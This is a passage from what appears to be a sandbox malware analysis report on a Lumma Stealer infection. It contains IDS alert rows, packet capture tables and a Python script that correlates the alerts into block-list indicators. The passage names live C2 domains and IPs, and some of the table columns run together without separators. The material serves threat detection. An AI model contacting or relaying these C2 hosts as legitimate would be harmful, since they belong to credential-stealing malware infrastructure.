| 2024-10-13T12:00:36.251128+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49745 | 172.67.206.204 | 443 | TCP |
| 2024-10-13T12:00:37.287454+0200 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49746 | 172.67.206.204 | 443 | TCP |
| 2024-10-13T12:00:37.287454+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49746 | 172.67.206.204 | 443 | TCP |
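The alert table shows the stealer walking its C2 list: for each domain a DNS lookup alert fires, then a TLS SNI alert on a new client port, then the generic "Related Activity" and "CnC Host Checkin" rules on that same flow. Turning that into indicators by hand is error-prone because the ET rule names defang the domain ("mathcucom .sbs"), the check-in rules carry no domain at all, and the very first check-in (port 49736 to 188.114.97.3) has no preceding SNI alert. The script below is an added example, not part of the Joe Sandbox report: it parses alert rows, re-joins the defanged domain, attributes each check-in to a domain by matching the flow (source IP, source port, destination IP) of the SNI alert, and reports check-ins it cannot attribute separately instead of guessing. Its input is a constructed subset of the rows above, transcribed as pipe-separated fields in the table's column order.

```python
"""Turn Suricata alert rows from the sandbox run into a correlated IOC set.

Constructed sample input: a subset of the IDS alert rows from the table above,
transcribed as pipe-separated fields in the same column order
(timestamp, SID, signature, severity, src IP, src port, dst IP, dst port, proto).
"""
import re

FIELDS = ("timestamp", "sid", "signature", "severity",
          "src_ip", "src_port", "dst_ip", "dst_port", "proto")

SAMPLE_ALERTS = """\
2024-10-13T12:00:28.046409+0200|2049836|ET MALWARE Lumma Stealer Related Activity|1|192.168.2.4|49736|188.114.97.3|443|TCP
2024-10-13T12:00:28.046409+0200|2054653|ET MALWARE Lumma Stealer CnC Host Checkin|1|192.168.2.4|49736|188.114.97.3|443|TCP
2024-10-13T12:00:28.058427+0200|2056570|ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs)|1|192.168.2.4|55215|1.1.1.1|53|UDP
2024-10-13T12:00:28.579610+0200|2056571|ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI)|1|192.168.2.4|49737|188.114.96.3|443|TCP
2024-10-13T12:00:29.015426+0200|2054653|ET MALWARE Lumma Stealer CnC Host Checkin|1|192.168.2.4|49737|188.114.96.3|443|TCP
2024-10-13T12:00:29.017335+0200|2056568|ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs)|1|192.168.2.4|58064|1.1.1.1|53|UDP
2024-10-13T12:00:29.044146+0200|2056566|ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs)|1|192.168.2.4|58164|1.1.1.1|53|UDP
2024-10-13T12:00:29.570044+0200|2056567|ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI)|1|192.168.2.4|49738|104.21.33.249|443|TCP
2024-10-13T12:00:30.024392+0200|2054653|ET MALWARE Lumma Stealer CnC Host Checkin|1|192.168.2.4|49738|104.21.33.249|443|TCP
"""

# ET rule names defang the domain with a space before the TLD ("mathcucom .sbs");
# the regex captures both halves so they can be re-joined into a usable indicator.
DOMAIN_RE = re.compile(r"\(([A-Za-z0-9-]+) \.([A-Za-z0-9-]+)(?: in TLS SNI)?\)")
DNS_LOOKUP_PREFIX = "ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup"
TLS_SNI_PREFIX = "ET MALWARE Observed Win32/Lumma Stealer Related Domain"
SID_CNC_CHECKIN = 2054653


def parse_alerts(text: str) -> list[dict]:
    """Parse pipe-separated alert rows; numeric columns become ints."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split("|")
        if len(parts) != len(FIELDS):
            raise ValueError(f"malformed alert row: {line!r}")
        row = dict(zip(FIELDS, parts))
        for key in ("sid", "severity", "src_port", "dst_port"):
            row[key] = int(row[key])
        rows.append(row)
    return rows


def extract_domain(signature: str):
    """Return the re-fanged domain named in an ET signature, or None."""
    m = DOMAIN_RE.search(signature)
    return f"{m.group(1)}.{m.group(2)}".lower() if m else None


def correlate(alerts: list[dict]) -> dict:
    """Per domain: was it queried in DNS, which server carried it in TLS SNI,
    and did that flow also trigger the CnC check-in rule.

    A DNS Lookup alert only proves a query was sent, not that it resolved;
    a domain with no matching SNI alert never produced a TLS connection.
    """
    domains: dict[str, dict] = {}
    sni_flow: dict[tuple, str] = {}   # (src_ip, src_port, dst_ip) -> domain
    for a in alerts:
        d = extract_domain(a["signature"])
        if d is None:
            continue
        entry = domains.setdefault(d, {"dns_query": False, "c2_ip": None, "checkin": False})
        if a["signature"].startswith(DNS_LOOKUP_PREFIX):
            entry["dns_query"] = True
        elif a["signature"].startswith(TLS_SNI_PREFIX):
            entry["c2_ip"] = a["dst_ip"]
            sni_flow[(a["src_ip"], a["src_port"], a["dst_ip"])] = d
    # Second pass: attribute check-in alerts to the domain seen on the same flow.
    unattributed = set()
    for a in alerts:
        if a["sid"] != SID_CNC_CHECKIN:
            continue
        key = (a["src_ip"], a["src_port"], a["dst_ip"])
        if key in sni_flow:
            domains[sni_flow[key]]["checkin"] = True
        else:
            unattributed.add(a["dst_ip"])   # check-in with no SNI alert: keep the IP, don't guess the domain
    return {"domains": domains, "unattributed_checkin_ips": sorted(unattributed)}


def build_iocs(alerts: list[dict]) -> dict:
    """Flatten the correlation into block-list ready indicators."""
    corr = correlate(alerts)
    dom = corr["domains"]
    return {
        "domains": sorted(dom),
        "ips": sorted({v["c2_ip"] for v in dom.values() if v["c2_ip"]}
                      | set(corr["unattributed_checkin_ips"])),
        "live_c2": sorted(d for d, v in dom.items() if v["checkin"]),
        "unattributed_checkin_ips": corr["unattributed_checkin_ips"],
    }


if __name__ == "__main__":
    import json
    print(json.dumps(build_iocs(parse_alerts(SAMPLE_ALERTS)), indent=2))
```

Keying on the flow tuple rather than on timestamps is deliberate: the SNI and check-in alerts for one connection share a client port, while the timestamps of the DNS query and the TLS handshake for the next domain overlap. The destination IPs are Cloudflare-fronted in this run, so treat the domains as the durable indicators and the IPs as context.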
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Oct 13, 2024 12:00:26.813090086 CEST | 49736 | 443 | 192.168.2.4 | 188.114.97.3 |
| Oct 13, 2024 12:00:26.813182116 CEST | 443 | 49736 | 188.114.97.3 | 192.168.2.4 |
| Oct 13, 2024 12:00:26.813503981 CEST | 49736 | 443 | 192.168.2.4 | 188.114.97.3 |
| Oct 13, 2024 12:00:26.817025900 CEST | 49736 | 443 | 192.168.2.4 | 188.114.97.3 |
| Oct 13, 2024 12:00:26.817102909 CEST | 443 | 49736 | 188.114.97.3 | 192.168.2.4 |
| Oct 13, 2024 12:00:27.319123983 CEST | 443 | 49736 | 188.114.97.3 | 192.168.2.4 |
| Oct 13, 2024 12:00:27.319257975 CEST | 49736 | 443 | 192.168.2.4 | 188.114.97.3 |
| Oct 13, 2024 12:00:27.360507011 CEST | 49736 | 443 | 192.168.2.4 | 188.114.97.3 |
| Oct 13, 2024 12:00:27.360589027 CEST | 443 | 49736 | 188.114.97.3 | 192.168.2.4 |
| Oct 13, 2024 12:00:27.361474991 CEST | 443 | 49736 | 188.114.97.3 | 192.168.2.4 |
| Oct 13, 2024 12:00:27.422916889 CEST | 49736 | 443 | 192.168.2.4 | 188.114.97.3 |
| Oct 13, 2024 12:00:27.617378950 CEST | 49736 | 443 | 192.168.2.4 | 188.114.97.3 |
| Oct 13, 2024 12:00:27.617410898 CEST | 49736 | 443 | 192.168.2.4 | 188.114.97.3 |
| Oct 13, 2024 12:00:27.617618084 CEST | 443 | 49736 | 188.114.97.3 | 192.168.2.4 |
| Oct 13, 2024 12:00:28.046444893 CEST | 443 | 49736 | 188.114.97.3 | 192.168.2.4 |
| Oct 13, 2024 12:00:28.046678066 CEST | 443 | 49736 | 188.114.97.3 | 192.168.2.4 |
| Oct 13, 2024 12:00:28.046854019 CEST | 49736 | 443 | 192.168.2.4 | 188.114.97.3 |
| Oct 13, 2024 12:00:28.049194098 CEST | 49736 | 443 | 192.168.2.4 | 188.114.97.3 |
| Oct 13, 2024 12:00:28.049263954 CEST | 443 | 49736 | 188.114.97.3 | 192.168.2.4 |
| Oct 13, 2024 12:00:28.049315929 CEST | 49736 | 443 | 192.168.2.4 | 188.114.97.3 |
| Oct 13, 2024 12:00:28.049334049 CEST | 443 | 49736 | 188.114.97.3 | 192.168.2.4 |
| Oct 13, 2024 12:00:28.073508978 CEST | 49737 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 13, 2024 12:00:28.073595047 CEST | 443 | 49737 | 188.114.96.3 | 192.168.2.4 |
| Oct 13, 2024 12:00:28.073918104 CEST | 49737 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 13, 2024 12:00:28.074085951 CEST | 49737 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 13, 2024 12:00:28.074125051 CEST | 443 | 49737 | 188.114.96.3 | 192.168.2.4 |
| Oct 13, 2024 12:00:28.579476118 CEST | 443 | 49737 | 188.114.96.3 | 192.168.2.4 |
| Oct 13, 2024 12:00:28.579610109 CEST | 49737 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 13, 2024 12:00:28.581970930 CEST | 49737 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 13, 2024 12:00:28.581999063 CEST | 443 | 49737 | 188.114.96.3 | 192.168.2.4 |
| Oct 13, 2024 12:00:28.582375050 CEST | 443 | 49737 | 188.114.96.3 | 192.168.2.4 |
| Oct 13, 2024 12:00:28.583933115 CEST | 49737 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 13, 2024 12:00:28.583933115 CEST | 49737 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 13, 2024 12:00:28.584176064 CEST | 443 | 49737 | 188.114.96.3 | 192.168.2.4 |
| Oct 13, 2024 12:00:29.015501976 CEST | 443 | 49737 | 188.114.96.3 | 192.168.2.4 |
| Oct 13, 2024 12:00:29.015728951 CEST | 443 | 49737 | 188.114.96.3 | 192.168.2.4 |
| Oct 13, 2024 12:00:29.015922070 CEST | 49737 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 13, 2024 12:00:29.015923023 CEST | 49737 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 13, 2024 12:00:29.015923023 CEST | 49737 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 13, 2024 12:00:29.064994097 CEST | 49738 | 443 | 192.168.2.4 | 104.21.33.249 |
| Oct 13, 2024 12:00:29.065078974 CEST | 443 | 49738 | 104.21.33.249 | 192.168.2.4 |
| Oct 13, 2024 12:00:29.065186024 CEST | 49738 | 443 | 192.168.2.4 | 104.21.33.249 |
| Oct 13, 2024 12:00:29.065593004 CEST | 49738 | 443 | 192.168.2.4 | 104.21.33.249 |
| Oct 13, 2024 12:00:29.065630913 CEST | 443 | 49738 | 104.21.33.249 | 192.168.2.4 |
| Oct 13, 2024 12:00:29.317600965 CEST | 49737 | 443 | 192.168.2.4 | 188.114.96.3 |
| Oct 13, 2024 12:00:29.317662954 CEST | 443 | 49737 | 188.114.96.3 | 192.168.2.4 |
| Oct 13, 2024 12:00:29.569945097 CEST | 443 | 49738 | 104.21.33.249 | 192.168.2.4 |
| Oct 13, 2024 12:00:29.570044041 CEST | 49738 | 443 | 192.168.2.4 | 104.21.33.249 |
| Oct 13, 2024 12:00:29.572174072 CEST | 49738 | 443 | 192.168.2.4 | 104.21.33.249 |
| Oct 13, 2024 12:00:29.572201014 CEST | 443 | 49738 | 104.21.33.249 | 192.168.2.4 |
| Oct 13, 2024 12:00:29.572577953 CEST | 443 | 49738 | 104.21.33.249 | 192.168.2.4 |
| Oct 13, 2024 12:00:29.574124098 CEST | 49738 | 443 | 192.168.2.4 | 104.21.33.249 |
| Oct 13, 2024 12:00:29.574163914 CEST | 49738 | 443 | 192.168.2.4 | 104.21.33.249 |
| Oct 13, 2024 12:00:29.574330091 CEST | 443 | 49738 | 104.21.33.249 | 192.168.2.4 |
| Oct 13, 2024 12:00:30.024441957 CEST | 443 | 49738 | 104.21.33.249 | 192.168.2.4 |
| Oct 13, 2024 12:00:30.024684906 CEST | 443 | 49738 | 104.21.33.249 | 192.168.2.4 |
| Oct 13, 2024 12:00:30.024889946 CEST | 49738 | 443 | 192.168.2.4 | 104.21.33.249 |
| Oct 13, 2024 12:00:30.068192005 CEST | 49738 | 443 | 192.168.2.4 | 104.21.33.249 |
| Oct 13, 2024 12:00:30.068192005 CEST | 49738 | 443 | 192.168.2.4 | 104.21.33.249 |
| Oct 13, 2024 12:00:30.068258047 CEST | 443 | 49738 | 104.21.33.249 | 192.168.2.4 |
| Oct 13, 2024 12:00:30.068298101 CEST | 443 | 49738 | 104.21.33.249 | 192.168.2.4 |
| Oct 13, 2024 12:00:30.095501900 CEST | 49739 | 443 | 192.168.2.4 | 104.21.77.78 |
| Oct 13, 2024 12:00:30.095588923 CEST | 443 | 49739 | 104.21.77.78 | 192.168.2.4 |
| Oct 13, 2024 12:00:30.095698118 CEST | 49739 | 443 | 192.168.2.4 | 104.21.77.78 |
| Oct 13, 2024 12:00:30.095987082 CEST | 49739 | 443 | 192.168.2.4 | 104.21.77.78 |
| Oct 13, 2024 12:00:30.096020937 CEST | 443 | 49739 | 104.21.77.78 | 192.168.2.4 |
| Oct 13, 2024 12:00:30.581763029 CEST | 443 | 49739 | 104.21.77.78 | 192.168.2.4 |
| Oct 13, 2024 12:00:30.581850052 CEST | 49739 | 443 | 192.168.2.4 | 104.21.77.78 |
| Oct 13, 2024 12:00:30.584156036 CEST | 49739 | 443 | 192.168.2.4 | 104.21.77.78 |
| Oct 13, 2024 12:00:30.584187031 CEST | 443 | 49739 | 104.21.77.78 | 192.168.2.4 |
| Oct 13, 2024 12:00:30.584527969 CEST | 443 | 49739 | 104.21.77.78 | 192.168.2.4 |
| Oct 13, 2024 12:00:30.585673094 CEST | 49739 | 443 | 192.168.2.4 | 104.21.77.78 |
| Oct 13, 2024 12:00:30.585673094 CEST | 49739 | 443 | 192.168.2.4 | 104.21.77.78 |
| Oct 13, 2024 12:00:30.585762024 CEST | 443 | 49739 | 104.21.77.78 | 192.168.2.4 |
| Oct 13, 2024 12:00:30.979680061 CEST | 443 | 49739 | 104.21.77.78 | 192.168.2.4 |
| Oct 13, 2024 12:00:30.979780912 CEST | 443 | 49739 | 104.21.77.78 | 192.168.2.4 |
| Oct 13, 2024 12:00:30.980010033 CEST | 49739 | 443 | 192.168.2.4 | 104.21.77.78 |
| Oct 13, 2024 12:00:30.980257034 CEST | 49739 | 443 | 192.168.2.4 | 104.21.77.78 |
| Oct 13, 2024 12:00:30.980303049 CEST | 443 | 49739 | 104.21.77.78 | 192.168.2.4 |
| Oct 13, 2024 12:00:30.980334044 CEST | 49739 | 443 | 192.168.2.4 | 104.21.77.78 |
| Oct 13, 2024 12:00:30.980349064 CEST | 443 | 49739 | 104.21.77.78 | 192.168.2.4 |
| Oct 13, 2024 12:00:31.010396957 CEST | 49740 | 443 | 192.168.2.4 | 172.67.140.193 |
| Oct 13, 2024 12:00:31.010482073 CEST | 443 | 49740 | 172.67.140.193 | 192.168.2.4 |
| Oct 13, 2024 12:00:31.010759115 CEST | 49740 | 443 | 192.168.2.4 | 172.67.140.193 |
| Oct 13, 2024 12:00:31.011128902 CEST | 49740 | 443 | 192.168.2.4 | 172.67.140.193 |
| Oct 13, 2024 12:00:31.011188030 CEST | 443 | 49740 | 172.67.140.193 | 192.168.2.4 |
| Oct 13, 2024 12:00:31.511683941 CEST | 443 | 49740 | 172.67.140.193 | 192.168.2.4 |
| Oct 13, 2024 12:00:31.511895895 CEST | 49740 | 443 | 192.168.2.4 | 172.67.140.193 |
| Oct 13, 2024 12:00:31.514389992 CEST | 49740 | 443 | 192.168.2.4 | 172.67.140.193 |
| Oct 13, 2024 12:00:31.514420033 CEST | 443 | 49740 | 172.67.140.193 | 192.168.2.4 |
| Oct 13, 2024 12:00:31.514935017 CEST | 443 | 49740 | 172.67.140.193 | 192.168.2.4 |
| Oct 13, 2024 12:00:31.516587019 CEST | 49740 | 443 | 192.168.2.4 | 172.67.140.193 |
| Oct 13, 2024 12:00:31.516644955 CEST | 49740 | 443 | 192.168.2.4 | 172.67.140.193 |
| Oct 13, 2024 12:00:31.516674995 CEST | 443 | 49740 | 172.67.140.193 | 192.168.2.4 |
| Oct 13, 2024 12:00:31.974452019 CEST | 443 | 49740 | 172.67.140.193 | 192.168.2.4 |
| Oct 13, 2024 12:00:31.974730968 CEST | 443 | 49740 | 172.67.140.193 | 192.168.2.4 |
| Oct 13, 2024 12:00:31.974932909 CEST | 49740 | 443 | 192.168.2.4 | 172.67.140.193 |
| Oct 13, 2024 12:00:31.974932909 CEST | 49740 | 443 | 192.168.2.4 | 172.67.140.193 |
| Oct 13, 2024 12:00:31.974934101 CEST | 49740 | 443 | 192.168.2.4 | 172.67.140.193 |
| Oct 13, 2024 12:00:31.997968912 CEST | 49741 | 443 | 192.168.2.4 | 172.67.173.224 |
| Oct 13, 2024 12:00:31.997991085 CEST | 443 | 49741 | 172.67.173.224 | 192.168.2.4 |
| Oct 13, 2024 12:00:31.998061895 CEST | 49741 | 443 | 192.168.2.4 | 172.67.173.224 |
| Oct 13, 2024 12:00:31.998517036 CEST | 49741 | 443 | 192.168.2.4 | 172.67.173.224 |
| Oct 13, 2024 12:00:31.998522997 CEST | 443 | 49741 | 172.67.173.224 | 192.168.2.4 |
| Oct 13, 2024 12:00:32.286341906 CEST | 49740 | 443 | 192.168.2.4 | 172.67.140.193 |
| Oct 13, 2024 12:00:32.286402941 CEST | 443 | 49740 | 172.67.140.193 | 192.168.2.4 |
| Oct 13, 2024 12:00:32.501454115 CEST | 443 | 49741 | 172.67.173.224 | 192.168.2.4 |
| Oct 13, 2024 12:00:32.501559973 CEST | 49741 | 443 | 192.168.2.4 | 172.67.173.224 |
| Oct 13, 2024 12:00:32.503834009 CEST | 49741 | 443 | 192.168.2.4 | 172.67.173.224 |
| Oct 13, 2024 12:00:32.503839016 CEST | 443 | 49741 | 172.67.173.224 | 192.168.2.4 |
| Oct 13, 2024 12:00:32.504307985 CEST | 443 | 49741 | 172.67.173.224 | 192.168.2.4 |
| Oct 13, 2024 12:00:32.506055117 CEST | 49741 | 443 | 192.168.2.4 | 172.67.173.224 |
| Oct 13, 2024 12:00:32.506087065 CEST | 49741 | 443 | 192.168.2.4 | 172.67.173.224 |
| Oct 13, 2024 12:00:32.506277084 CEST | 443 | 49741 | 172.67.173.224 | 192.168.2.4 |
| Oct 13, 2024 12:00:32.962544918 CEST | 443 | 49741 | 172.67.173.224 | 192.168.2.4 |
| Oct 13, 2024 12:00:32.962779999 CEST | 443 | 49741 | 172.67.173.224 | 192.168.2.4 |
| Oct 13, 2024 12:00:32.962845087 CEST | 49741 | 443 | 192.168.2.4 | 172.67.173.224 |
| Oct 13, 2024 12:00:32.968961000 CEST | 49741 | 443 | 192.168.2.4 | 172.67.173.224 |
| Oct 13, 2024 12:00:32.968971014 CEST | 443 | 49741 | 172.67.173.224 | 192.168.2.4 |
| Oct 13, 2024 12:00:32.968985081 CEST | 49741 | 443 | 192.168.2.4 | 172.67.173.224 |
| Oct 13, 2024 12:00:32.968990088 CEST | 443 | 49741 | 172.67.173.224 | 192.168.2.4 |
                                                                                                                Oct 13, 2024 12:00:33.004656076 CEST49742443192.168.2.4104.21.79.35
                                                                                                                Oct 13, 2024 12:00:33.004705906 CEST44349742104.21.79.35192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.004796028 CEST49742443192.168.2.4104.21.79.35
                                                                                                                Oct 13, 2024 12:00:33.005290031 CEST49742443192.168.2.4104.21.79.35
                                                                                                                Oct 13, 2024 12:00:33.005306005 CEST44349742104.21.79.35192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.482741117 CEST44349742104.21.79.35192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.483066082 CEST49742443192.168.2.4104.21.79.35
                                                                                                                Oct 13, 2024 12:00:33.484863043 CEST49742443192.168.2.4104.21.79.35
                                                                                                                Oct 13, 2024 12:00:33.484873056 CEST44349742104.21.79.35192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.485354900 CEST44349742104.21.79.35192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.487468004 CEST49742443192.168.2.4104.21.79.35
                                                                                                                Oct 13, 2024 12:00:33.487494946 CEST49742443192.168.2.4104.21.79.35
                                                                                                                Oct 13, 2024 12:00:33.487698078 CEST44349742104.21.79.35192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.944500923 CEST44349742104.21.79.35192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.944735050 CEST44349742104.21.79.35192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.944792986 CEST49742443192.168.2.4104.21.79.35
                                                                                                                Oct 13, 2024 12:00:33.945214033 CEST49742443192.168.2.4104.21.79.35
                                                                                                                Oct 13, 2024 12:00:33.945235014 CEST44349742104.21.79.35192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.945246935 CEST49742443192.168.2.4104.21.79.35
                                                                                                                Oct 13, 2024 12:00:33.945251942 CEST44349742104.21.79.35192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.965183020 CEST49743443192.168.2.4188.114.97.3
                                                                                                                Oct 13, 2024 12:00:33.965270042 CEST44349743188.114.97.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:33.965373993 CEST49743443192.168.2.4188.114.97.3
                                                                                                                Oct 13, 2024 12:00:33.965883017 CEST49743443192.168.2.4188.114.97.3
                                                                                                                Oct 13, 2024 12:00:33.965959072 CEST44349743188.114.97.3192.168.2.4
                                                                                                                Oct 13, 2024 12:00:34.145781994 CEST49743443192.168.2.4188.114.97.3
                                                                                                                Oct 13, 2024 12:00:34.155818939 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:34.155838013 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:34.155905962 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:34.156519890 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:34.156533957 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:34.873780966 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:34.873903036 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:34.875864029 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:34.875869989 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:34.876358032 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:34.878119946 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:34.919447899 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.413125992 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.413189888 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.413202047 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.413217068 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.413233042 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.413253069 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.413294077 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.413299084 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.457998037 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.561690092 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.561753988 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.561772108 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.561783075 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.561810970 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.561825037 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.561907053 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.561964035 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.562021017 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.562067032 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.562069893 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.562174082 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.562223911 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.562253952 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.562263966 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.562273979 CEST49744443192.168.2.4104.102.49.254
                                                                                                                Oct 13, 2024 12:00:35.562278032 CEST44349744104.102.49.254192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.631335020 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:35.631380081 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:35.631464005 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:35.631848097 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:35.631859064 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.132714987 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.133164883 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.135338068 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.135420084 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.135967970 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.137757063 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.137757063 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.138025999 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.251207113 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.251324892 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.251432896 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.251511097 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.251554012 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.251624107 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.251662016 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.251759052 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.251959085 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.251959085 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.251959085 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.314137936 CEST49746443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.314222097 CEST44349746172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.314316988 CEST49746443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.314677000 CEST49746443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.314737082 CEST44349746172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.551794052 CEST49745443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.551856041 CEST44349745172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.817224026 CEST44349746172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.817467928 CEST49746443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.818979025 CEST49746443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.819032907 CEST44349746172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.819554090 CEST44349746172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:36.821067095 CEST49746443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.821067095 CEST49746443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:36.821330070 CEST44349746172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:37.287498951 CEST44349746172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:37.287729979 CEST44349746172.67.206.204192.168.2.4
                                                                                                                Oct 13, 2024 12:00:37.288094044 CEST49746443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:37.288176060 CEST49746443192.168.2.4172.67.206.204
                                                                                                                Oct 13, 2024 12:00:37.288177013 CEST49746443192.168.2.4172.67.206.204
